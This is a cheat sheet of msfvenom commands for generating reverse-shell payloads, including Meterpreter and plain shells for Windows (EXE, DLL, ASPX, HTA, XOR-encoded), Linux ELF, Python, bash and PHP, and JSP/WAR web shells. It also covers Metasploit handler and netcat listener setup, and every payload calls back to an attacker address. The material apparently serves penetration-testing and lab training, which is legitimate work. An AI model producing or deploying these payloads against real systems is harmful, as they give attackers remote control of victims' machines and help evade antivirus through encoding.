MSFVENOM – Reverse Shell Cheat Sheet

Basic Syntax

msfvenom -p <PAYLOAD> LHOST=<IP> LPORT=<PORT> -f <FORMAT> -o <FILE>

Common Options

Option	Description
`-p`	Payload
`LHOST`	Attacker IP
`LPORT`	Listening port
`-f`	Output format
`-o`	Output file
`-e`	Encoder
`-i`	Encode iterations
`-b`	Bad chars
`--platform`	Force platform
`-a`	Architecture

Listener

msfconsole
use exploit/multi/handler
set payload <PAYLOAD>
set LHOST <IP>
set LPORT <PORT>
run

Windows Payloads

Meterpreter (Recommended)

EXE

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe

Staged HTTPS

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.8 LPORT=443 -f exe -o shell.exe

DLL

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f dll -o shell.dll

ASPX

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f aspx -o shell.aspx

HTA

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f hta-psh -o shell.hta

Normal Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f exe -o shell.exe

Listener:

nc -lvnp 4444

Encoded Payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 \
-e x64/xor -i 10 -f exe -o shell.exe

Linux Payloads

Meterpreter ELF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf

Normal Shell

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f elf -o shell.elf

Listener:

nc -lvnp 4444

Python Payload

msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.8 LPORT=4444 -f raw

Execute:

python3 -c "<PASTE PAYLOAD>"

Bash One-liner

msfvenom -p cmd/unix/reverse_bash LHOST=10.10.14.8 LPORT=4444 -f raw

PHP Webshell

msfvenom -p php/reverse_php LHOST=10.10.14.8 LPORT=4444 -o shell.php

Listener:

nc -lvnp 4444

Web Payloads

Language	Payload
JSP	`java/jsp_shell_reverse_tcp`
WAR	`java/jsp_shell_reverse_tcp -f war`
PHP	`php/reverse_php`
ASP	`windows/meterpreter/reverse_tcp -f asp`
ASPX	`windows/meterpreter/reverse_tcp -f aspx`

Example:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war -o shell.war

Documentation Index

​Basic Syntax

​Common Options

​Listener

​Windows Payloads

​Meterpreter (Recommended)

​EXE

​Staged HTTPS

​DLL

​ASPX

​HTA

​Normal Shell

​Encoded Payload

​Linux Payloads

​Meterpreter ELF

​Normal Shell

​Python Payload

​Bash One-liner

​PHP Webshell

​Web Payloads

Basic Syntax

Common Options

Listener

Windows Payloads

Meterpreter (Recommended)

EXE

Staged HTTPS

DLL

ASPX

HTA

Normal Shell

Encoded Payload

Linux Payloads

Meterpreter ELF

Normal Shell

Python Payload

Bash One-liner

PHP Webshell

Web Payloads